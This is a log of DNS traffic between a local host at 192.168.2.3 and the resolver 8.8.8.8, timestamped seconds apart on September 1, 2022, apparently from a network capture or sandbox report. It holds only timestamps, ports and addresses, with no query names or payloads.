Sep 1, 2022 00:02:57.530978918 CEST	53	62435	8.8.8.8	192.168.2.3
Sep 1, 2022 00:02:57.542714119 CEST	62436	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:02:57.561358929 CEST	53	62436	8.8.8.8	192.168.2.3
Sep 1, 2022 00:02:57.924940109 CEST	64271	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:02:58.928544044 CEST	64271	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:02:59.943011045 CEST	64271	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:03:00.010236025 CEST	53	64271	8.8.8.8	192.168.2.3
Sep 1, 2022 00:03:00.017366886 CEST	64272	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:03:00.035882950 CEST	53	64272	8.8.8.8	192.168.2.3
Sep 1, 2022 00:03:00.036817074 CEST	64273	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:03:00.057038069 CEST	53	64273	8.8.8.8	192.168.2.3
Sep 1, 2022 00:03:00.057399988 CEST	64274	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:03:00.076392889 CEST	53	64274	8.8.8.8	192.168.2.3
Sep 1, 2022 00:03:00.076893091 CEST	64275	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:03:00.097615957 CEST	53	64275	8.8.8.8	192.168.2.3
Sep 1, 2022 00:03:00.100399017 CEST	64276	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:03:00.121129990 CEST	53	64276	8.8.8.8	192.168.2.3
Sep 1, 2022 00:03:00.563648939 CEST	51105	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:03:01.554763079 CEST	51105	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:03:01.584554911 CEST	53	51105	8.8.8.8	192.168.2.3
Sep 1, 2022 00:03:01.595273972 CEST	53	51105	8.8.8.8	192.168.2.3
Sep 1, 2022 00:03:01.601682901 CEST	51106	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:03:01.622442007 CEST	53	51106	8.8.8.8	192.168.2.3
Sep 1, 2022 00:03:01.623106956 CEST	51107	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:03:01.644107103 CEST	53	51107	8.8.8.8	192.168.2.3
Sep 1, 2022 00:03:01.644612074 CEST	51108	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:03:01.665334940 CEST	53	51108	8.8.8.8	192.168.2.3
Sep 1, 2022 00:03:01.665771961 CEST	51109	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:03:01.686562061 CEST	53	51109	8.8.8.8	192.168.2.3
Sep 1, 2022 00:03:01.687030077 CEST	51110	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:03:01.706001043 CEST	53	51110	8.8.8.8	192.168.2.3
Sep 1, 2022 00:03:02.153387070 CEST	52455	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:03:02.779787064 CEST	53	52455	8.8.8.8	192.168.2.3
Sep 1, 2022 00:03:02.801975012 CEST	52456	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:03:02.821990013 CEST	53	52456	8.8.8.8	192.168.2.3
Sep 1, 2022 00:03:02.822494030 CEST	52457	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:03:02.843368053 CEST	53	52457	8.8.8.8	192.168.2.3
Sep 1, 2022 00:03:02.844405890 CEST	52458	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:03:02.865358114 CEST	53	52458	8.8.8.8	192.168.2.3
Sep 1, 2022 00:03:02.900983095 CEST	52459	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:03:02.922287941 CEST	53	52459	8.8.8.8	192.168.2.3
Sep 1, 2022 00:03:02.922605991 CEST	52460	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:03:02.942126989 CEST	53	52460	8.8.8.8	192.168.2.3
Sep 1, 2022 00:03:02.945770025 CEST	53	64271	8.8.8.8	192.168.2.3
Sep 1, 2022 00:03:03.343214035 CEST	55244	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:03:03.418770075 CEST	53	55244	8.8.8.8	192.168.2.3
Sep 1, 2022 00:03:03.427838087 CEST	55245	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:03:03.446106911 CEST	53	55245	8.8.8.8	192.168.2.3
Sep 1, 2022 00:03:03.448040962 CEST	55246	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:03:03.465781927 CEST	53	55246	8.8.8.8	192.168.2.3
Sep 1, 2022 00:03:03.466197014 CEST	55247	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:03:03.485872984 CEST	53	55247	8.8.8.8	192.168.2.3
Sep 1, 2022 00:03:03.486265898 CEST	55248	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:03:03.505850077 CEST	53	55248	8.8.8.8	192.168.2.3
Sep 1, 2022 00:03:03.506251097 CEST	55249	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:03:03.524724007 CEST	53	55249	8.8.8.8	192.168.2.3
Sep 1, 2022 00:03:03.962084055 CEST	64969	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:03:03.967163086 CEST	53	64271	8.8.8.8	192.168.2.3
Sep 1, 2022 00:03:04.974921942 CEST	64969	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:03:05.580583096 CEST	53	64969	8.8.8.8	192.168.2.3
Sep 1, 2022 00:03:05.594440937 CEST	64970	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:03:05.616434097 CEST	53	64970	8.8.8.8	192.168.2.3
Sep 1, 2022 00:03:05.617213011 CEST	64971	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:03:05.638950109 CEST	53	64971	8.8.8.8	192.168.2.3
Sep 1, 2022 00:03:05.639385939 CEST	64972	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:03:05.661201954 CEST	53	64972	8.8.8.8	192.168.2.3
Sep 1, 2022 00:03:05.661525011 CEST	64973	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:03:05.683096886 CEST	53	64973	8.8.8.8	192.168.2.3
Sep 1, 2022 00:03:05.683602095 CEST	64974	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:03:05.704983950 CEST	53	64974	8.8.8.8	192.168.2.3
Sep 1, 2022 00:03:06.090673923 CEST	53	64969	8.8.8.8	192.168.2.3
Sep 1, 2022 00:03:06.123651028 CEST	53037	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:03:06.253566980 CEST	53	53037	8.8.8.8	192.168.2.3
Sep 1, 2022 00:03:06.260365963 CEST	53038	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:03:06.279741049 CEST	53	53038	8.8.8.8	192.168.2.3
Sep 1, 2022 00:03:06.280270100 CEST	53039	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:03:06.300148010 CEST	53	53039	8.8.8.8	192.168.2.3
Sep 1, 2022 00:03:06.300781012 CEST	53040	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:03:06.318766117 CEST	53	53040	8.8.8.8	192.168.2.3
Sep 1, 2022 00:03:06.319112062 CEST	53041	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:03:06.339133978 CEST	53	53041	8.8.8.8	192.168.2.3
Sep 1, 2022 00:03:06.339869022 CEST	53042	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:03:06.360065937 CEST	53	53042	8.8.8.8	192.168.2.3
Sep 1, 2022 00:03:06.701911926 CEST	55457	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:03:07.230133057 CEST	53	55457	8.8.8.8	192.168.2.3
Sep 1, 2022 00:03:07.240674019 CEST	55458	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:03:07.261197090 CEST	53	55458	8.8.8.8	192.168.2.3
Sep 1, 2022 00:03:07.276021957 CEST	55459	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:03:07.297318935 CEST	53	55459	8.8.8.8	192.168.2.3
Sep 1, 2022 00:03:07.301197052 CEST	55460	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:03:07.321963072 CEST	53	55460	8.8.8.8	192.168.2.3
Sep 1, 2022 00:03:07.325311899 CEST	55461	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:03:07.345874071 CEST	53	55461	8.8.8.8	192.168.2.3
Sep 1, 2022 00:03:07.346616983 CEST	55462	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:03:07.367491961 CEST	53	55462	8.8.8.8	192.168.2.3
Sep 1, 2022 00:03:08.098186970 CEST	60816	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:03:08.672029018 CEST	53	60816	8.8.8.8	192.168.2.3
Sep 1, 2022 00:03:08.720036983 CEST	60817	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:03:08.740346909 CEST	53	60817	8.8.8.8	192.168.2.3
Sep 1, 2022 00:03:08.745096922 CEST	60818	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:03:08.766110897 CEST	53	60818	8.8.8.8	192.168.2.3
Sep 1, 2022 00:03:08.807703018 CEST	60819	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:03:08.827946901 CEST	53	60819	8.8.8.8	192.168.2.3
Sep 1, 2022 00:03:08.828383923 CEST	60820	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:03:08.846530914 CEST	53	60820	8.8.8.8	192.168.2.3
Sep 1, 2022 00:03:08.846909046 CEST	60821	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:03:08.866904974 CEST	53	60821	8.8.8.8	192.168.2.3
Sep 1, 2022 00:03:11.312613964 CEST	62424	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:03:11.907406092 CEST	53	62424	8.8.8.8	192.168.2.3
Sep 1, 2022 00:03:13.124238968 CEST	62425	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:03:13.145453930 CEST	53	62425	8.8.8.8	192.168.2.3
Sep 1, 2022 00:03:13.145962954 CEST	62426	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:03:13.167514086 CEST	53	62426	8.8.8.8	192.168.2.3
Sep 1, 2022 00:03:13.168036938 CEST	62427	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:03:13.187902927 CEST	53	62427	8.8.8.8	192.168.2.3
Sep 1, 2022 00:03:13.188986063 CEST	62428	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:03:13.209469080 CEST	53	62428	8.8.8.8	192.168.2.3
Sep 1, 2022 00:03:13.209944010 CEST	62429	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:03:13.232753992 CEST	53	62429	8.8.8.8	192.168.2.3
Sep 1, 2022 00:03:13.699589014 CEST	61126	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:03:14.710131884 CEST	61126	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:03:15.711199999 CEST	61126	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:03:15.875538111 CEST	53	61126	8.8.8.8	192.168.2.3
Sep 1, 2022 00:03:15.883177996 CEST	61127	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:03:15.886709929 CEST	53	61126	8.8.8.8	192.168.2.3
Sep 1, 2022 00:03:15.902874947 CEST	53	61127	8.8.8.8	192.168.2.3
Sep 1, 2022 00:03:15.903464079 CEST	61128	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:03:15.921664953 CEST	53	61128	8.8.8.8	192.168.2.3
Sep 1, 2022 00:03:15.922110081 CEST	61129	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:03:15.941783905 CEST	53	61129	8.8.8.8	192.168.2.3
Sep 1, 2022 00:03:15.942186117 CEST	61130	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:03:15.960310936 CEST	53	61130	8.8.8.8	192.168.2.3
Sep 1, 2022 00:03:15.960644960 CEST	61131	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:03:15.978528023 CEST	53	61131	8.8.8.8	192.168.2.3
Sep 1, 2022 00:03:16.393064976 CEST	55390	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:03:17.397872925 CEST	55390	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:03:17.783536911 CEST	53	61126	8.8.8.8	192.168.2.3
Sep 1, 2022 00:03:17.989558935 CEST	53	55390	8.8.8.8	192.168.2.3
Sep 1, 2022 00:03:18.001125097 CEST	58913	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:03:18.019994974 CEST	53	58913	8.8.8.8	192.168.2.3
Sep 1, 2022 00:03:18.020601034 CEST	58914	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:03:18.040131092 CEST	53	58914	8.8.8.8	192.168.2.3
Sep 1, 2022 00:03:18.040652990 CEST	58915	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:03:18.060370922 CEST	53	58915	8.8.8.8	192.168.2.3
Sep 1, 2022 00:03:18.060822964 CEST	58916	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:03:18.080894947 CEST	53	58916	8.8.8.8	192.168.2.3
Sep 1, 2022 00:03:18.082511902 CEST	58917	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:03:18.102590084 CEST	53	58917	8.8.8.8	192.168.2.3
Sep 1, 2022 00:03:18.621407986 CEST	50622	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:03:18.650096893 CEST	53	50622	8.8.8.8	192.168.2.3
Sep 1, 2022 00:03:18.657192945 CEST	50623	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:03:18.676616907 CEST	53	50623	8.8.8.8	192.168.2.3
Sep 1, 2022 00:03:18.677170992 CEST	50624	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:03:18.696774960 CEST	53	50624	8.8.8.8	192.168.2.3
Sep 1, 2022 00:03:18.697258949 CEST	50625	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:03:18.717092037 CEST	53	50625	8.8.8.8	192.168.2.3
Sep 1, 2022 00:03:18.717463970 CEST	50626	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:03:18.736999989 CEST	53	50626	8.8.8.8	192.168.2.3
Sep 1, 2022 00:03:18.737468004 CEST	50627	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:03:18.754909992 CEST	53	50627	8.8.8.8	192.168.2.3
Sep 1, 2022 00:03:19.167845011 CEST	55649	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:03:19.210956097 CEST	53	55649	8.8.8.8	192.168.2.3
Sep 1, 2022 00:03:19.219196081 CEST	55650	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:03:19.238610029 CEST	53	55650	8.8.8.8	192.168.2.3
Sep 1, 2022 00:03:19.239136934 CEST	55651	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:03:19.258774996 CEST	53	55651	8.8.8.8	192.168.2.3
Sep 1, 2022 00:03:19.259211063 CEST	55652	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:03:19.276746988 CEST	53	55652	8.8.8.8	192.168.2.3
Sep 1, 2022 00:03:19.277164936 CEST	55653	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:03:19.296673059 CEST	53	55653	8.8.8.8	192.168.2.3
Sep 1, 2022 00:03:19.297074080 CEST	55654	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:03:19.316821098 CEST	53	55654	8.8.8.8	192.168.2.3
Sep 1, 2022 00:03:19.696104050 CEST	53	55390	8.8.8.8	192.168.2.3
Sep 1, 2022 00:03:19.834583998 CEST	64376	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:03:19.938867092 CEST	53	64376	8.8.8.8	192.168.2.3
Sep 1, 2022 00:03:19.952431917 CEST	64377	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:03:19.971436024 CEST	53	64377	8.8.8.8	192.168.2.3
Sep 1, 2022 00:03:19.972138882 CEST	64378	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:03:19.991856098 CEST	53	64378	8.8.8.8	192.168.2.3
Sep 1, 2022 00:03:19.992460012 CEST	64379	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:03:20.010216951 CEST	53	64379	8.8.8.8	192.168.2.3
Sep 1, 2022 00:03:20.011368036 CEST	64380	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:03:20.031111956 CEST	53	64380	8.8.8.8	192.168.2.3
Sep 1, 2022 00:03:20.034172058 CEST	64381	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:03:20.051709890 CEST	53	64381	8.8.8.8	192.168.2.3
Sep 1, 2022 00:03:20.228393078 CEST	52110	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:03:20.256568909 CEST	53	52110	8.8.8.8	192.168.2.3
Sep 1, 2022 00:03:20.265758991 CEST	52111	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:03:20.283133984 CEST	53	52111	8.8.8.8	192.168.2.3
Sep 1, 2022 00:03:20.284135103 CEST	52112	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:03:20.303747892 CEST	53	52112	8.8.8.8	192.168.2.3
Sep 1, 2022 00:03:20.304409027 CEST	52113	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:03:20.323898077 CEST	53	52113	8.8.8.8	192.168.2.3
Sep 1, 2022 00:03:20.324394941 CEST	52114	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:03:20.344026089 CEST	53	52114	8.8.8.8	192.168.2.3
Sep 1, 2022 00:03:20.348262072 CEST	52115	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:03:20.366065979 CEST	53	52115	8.8.8.8	192.168.2.3
Sep 1, 2022 00:03:20.534615040 CEST	63687	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:03:21.523137093 CEST	63687	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:03:21.609051943 CEST	53	63687	8.8.8.8	192.168.2.3
Sep 1, 2022 00:03:21.620418072 CEST	63688	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:03:21.641108990 CEST	53	63688	8.8.8.8	192.168.2.3
Sep 1, 2022 00:03:21.642301083 CEST	63689	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:03:21.663789988 CEST	53	63689	8.8.8.8	192.168.2.3
Sep 1, 2022 00:03:21.664385080 CEST	63690	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:03:21.686964035 CEST	53	63690	8.8.8.8	192.168.2.3
Sep 1, 2022 00:03:21.687511921 CEST	63691	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:03:21.708765030 CEST	53	63691	8.8.8.8	192.168.2.3
Sep 1, 2022 00:03:21.709351063 CEST	63692	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:03:21.729496956 CEST	53	63692	8.8.8.8	192.168.2.3
Sep 1, 2022 00:03:21.888966084 CEST	57824	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:03:22.898207903 CEST	57824	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:03:22.926181078 CEST	53	57824	8.8.8.8	192.168.2.3
Sep 1, 2022 00:03:22.935939074 CEST	57825	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:03:22.956406116 CEST	53	57825	8.8.8.8	192.168.2.3
Sep 1, 2022 00:03:22.956962109 CEST	57826	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:03:22.978058100 CEST	53	57826	8.8.8.8	192.168.2.3
Sep 1, 2022 00:03:22.978908062 CEST	57827	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:03:22.999502897 CEST	53	57827	8.8.8.8	192.168.2.3
Sep 1, 2022 00:03:23.000022888 CEST	57828	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:03:23.021095037 CEST	53	57828	8.8.8.8	192.168.2.3
Sep 1, 2022 00:03:23.021548986 CEST	57829	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:03:23.042824030 CEST	53	57829	8.8.8.8	192.168.2.3
Sep 1, 2022 00:03:23.209656954 CEST	52741	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:03:23.514621973 CEST	53	57824	8.8.8.8	192.168.2.3
Sep 1, 2022 00:03:23.968266010 CEST	53	52741	8.8.8.8	192.168.2.3
Sep 1, 2022 00:03:23.980442047 CEST	52742	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:03:23.997780085 CEST	53	52742	8.8.8.8	192.168.2.3
Sep 1, 2022 00:03:23.998657942 CEST	52743	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:03:24.018424988 CEST	53	52743	8.8.8.8	192.168.2.3
Sep 1, 2022 00:03:24.019182920 CEST	52744	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:03:24.039185047 CEST	53	52744	8.8.8.8	192.168.2.3
Sep 1, 2022 00:03:24.040007114 CEST	52745	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:03:24.059684038 CEST	53	52745	8.8.8.8	192.168.2.3
Sep 1, 2022 00:03:24.060420036 CEST	52746	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:03:24.078253031 CEST	53	52746	8.8.8.8	192.168.2.3
Sep 1, 2022 00:03:24.239500046 CEST	60644	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:03:25.226500988 CEST	60644	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:03:25.255103111 CEST	53	60644	8.8.8.8	192.168.2.3
Sep 1, 2022 00:03:25.263760090 CEST	60645	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:03:25.281069994 CEST	53	60645	8.8.8.8	192.168.2.3
Sep 1, 2022 00:03:25.281759977 CEST	60646	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:03:25.299524069 CEST	53	60646	8.8.8.8	192.168.2.3
Sep 1, 2022 00:03:25.300157070 CEST	60647	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:03:25.319861889 CEST	53	60647	8.8.8.8	192.168.2.3
Sep 1, 2022 00:03:25.320561886 CEST	60648	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:03:25.340485096 CEST	53	60648	8.8.8.8	192.168.2.3
Sep 1, 2022 00:03:25.341169119 CEST	60649	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:03:25.361062050 CEST	53	60649	8.8.8.8	192.168.2.3
Sep 1, 2022 00:03:25.538189888 CEST	55951	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:03:25.566684961 CEST	53	55951	8.8.8.8	192.168.2.3
Sep 1, 2022 00:03:25.576621056 CEST	55952	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:03:25.593641996 CEST	53	55952	8.8.8.8	192.168.2.3
Sep 1, 2022 00:03:25.594151020 CEST	55953	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:03:25.611632109 CEST	53	55953	8.8.8.8	192.168.2.3
Sep 1, 2022 00:03:25.612011909 CEST	55954	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:03:25.631575108 CEST	53	55954	8.8.8.8	192.168.2.3
Sep 1, 2022 00:03:25.632008076 CEST	55955	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:03:25.649888039 CEST	53	55955	8.8.8.8	192.168.2.3
Sep 1, 2022 00:03:25.650229931 CEST	55956	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:03:25.669991970 CEST	53	55956	8.8.8.8	192.168.2.3
Sep 1, 2022 00:03:25.840779066 CEST	51592	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:03:25.946975946 CEST	53	60644	8.8.8.8	192.168.2.3
Sep 1, 2022 00:03:26.542138100 CEST	53	63687	8.8.8.8	192.168.2.3
Sep 1, 2022 00:03:26.836159945 CEST	51592	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:03:26.874851942 CEST	53	51592	8.8.8.8	192.168.2.3
Sep 1, 2022 00:03:26.882740974 CEST	51593	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:03:26.904150963 CEST	53	51593	8.8.8.8	192.168.2.3
Sep 1, 2022 00:03:26.907030106 CEST	51594	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:03:26.929198980 CEST	53	51594	8.8.8.8	192.168.2.3
Sep 1, 2022 00:03:26.929732084 CEST	51595	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:03:26.951956987 CEST	53	51595	8.8.8.8	192.168.2.3
Sep 1, 2022 00:03:26.954768896 CEST	51596	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:03:26.976304054 CEST	53	51596	8.8.8.8	192.168.2.3
Sep 1, 2022 00:03:26.976847887 CEST	51597	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:03:26.997859001 CEST	53	51597	8.8.8.8	192.168.2.3
Sep 1, 2022 00:03:26.998966932 CEST	53	51592	8.8.8.8	192.168.2.3
Sep 1, 2022 00:03:27.174635887 CEST	61359	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:03:28.164587021 CEST	61359	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:03:28.328942060 CEST	53	61359	8.8.8.8	192.168.2.3
Sep 1, 2022 00:03:28.343839884 CEST	61360	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:03:28.362921000 CEST	53	61360	8.8.8.8	192.168.2.3
Sep 1, 2022 00:03:28.363595009 CEST	61361	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:03:28.383085012 CEST	53	61361	8.8.8.8	192.168.2.3
Sep 1, 2022 00:03:28.520062923 CEST	61362	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:03:28.538108110 CEST	53	61362	8.8.8.8	192.168.2.3
Sep 1, 2022 00:03:28.538480043 CEST	61363	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:03:28.558254004 CEST	53	61363	8.8.8.8	192.168.2.3
Sep 1, 2022 00:03:28.558638096 CEST	61364	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:03:28.578342915 CEST	53	61364	8.8.8.8	192.168.2.3
Sep 1, 2022 00:03:28.692234039 CEST	53	61359	8.8.8.8	192.168.2.3
Sep 1, 2022 00:03:28.762604952 CEST	58480	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:03:29.338186979 CEST	53	58480	8.8.8.8	192.168.2.3
Sep 1, 2022 00:03:29.344712973 CEST	58481	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:03:29.362001896 CEST	53	58481	8.8.8.8	192.168.2.3
Sep 1, 2022 00:03:29.362481117 CEST	58482	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:03:29.383466005 CEST	53	58482	8.8.8.8	192.168.2.3
Sep 1, 2022 00:03:29.383908987 CEST	58483	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:03:29.401654959 CEST	53	58483	8.8.8.8	192.168.2.3
Sep 1, 2022 00:03:29.402066946 CEST	58484	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:03:29.423216105 CEST	53	58484	8.8.8.8	192.168.2.3
Sep 1, 2022 00:03:30.012593985 CEST	58485	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:03:30.033303976 CEST	53	58485	8.8.8.8	192.168.2.3
Sep 1, 2022 00:03:30.204734087 CEST	51889	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:03:30.819206953 CEST	53	51889	8.8.8.8	192.168.2.3
Sep 1, 2022 00:03:30.891808033 CEST	51890	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:03:30.911178112 CEST	53	51890	8.8.8.8	192.168.2.3
Sep 1, 2022 00:03:31.975245953 CEST	51891	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:03:31.996062040 CEST	53	51891	8.8.8.8	192.168.2.3
Sep 1, 2022 00:03:31.996526957 CEST	51892	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:03:32.016911030 CEST	53	51892	8.8.8.8	192.168.2.3
Sep 1, 2022 00:03:32.036712885 CEST	51893	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:03:32.055161953 CEST	53	51893	8.8.8.8	192.168.2.3
Sep 1, 2022 00:03:32.055555105 CEST	51894	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:03:32.077513933 CEST	53	51894	8.8.8.8	192.168.2.3
Sep 1, 2022 00:03:32.280885935 CEST	60418	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:03:32.328344107 CEST	53	60418	8.8.8.8	192.168.2.3
Sep 1, 2022 00:03:32.339962959 CEST	60419	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:03:32.360487938 CEST	53	60419	8.8.8.8	192.168.2.3
Sep 1, 2022 00:03:32.361099958 CEST	60420	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:03:32.381845951 CEST	53	60420	8.8.8.8	192.168.2.3
Sep 1, 2022 00:03:32.382333040 CEST	60421	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:03:32.402843952 CEST	53	60421	8.8.8.8	192.168.2.3
Sep 1, 2022 00:03:32.403374910 CEST	60422	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:03:32.423881054 CEST	53	60422	8.8.8.8	192.168.2.3
Sep 1, 2022 00:03:32.424187899 CEST	60423	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:03:32.444027901 CEST	53	60423	8.8.8.8	192.168.2.3
Sep 1, 2022 00:03:32.614773035 CEST	54283	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:03:33.602144957 CEST	54283	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:03:33.662503004 CEST	53	54283	8.8.8.8	192.168.2.3
Sep 1, 2022 00:03:33.674870014 CEST	54284	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:03:33.694170952 CEST	53	54284	8.8.8.8	192.168.2.3
Sep 1, 2022 00:03:33.695070028 CEST	54285	53	192.168.2.3	8.8.8.8
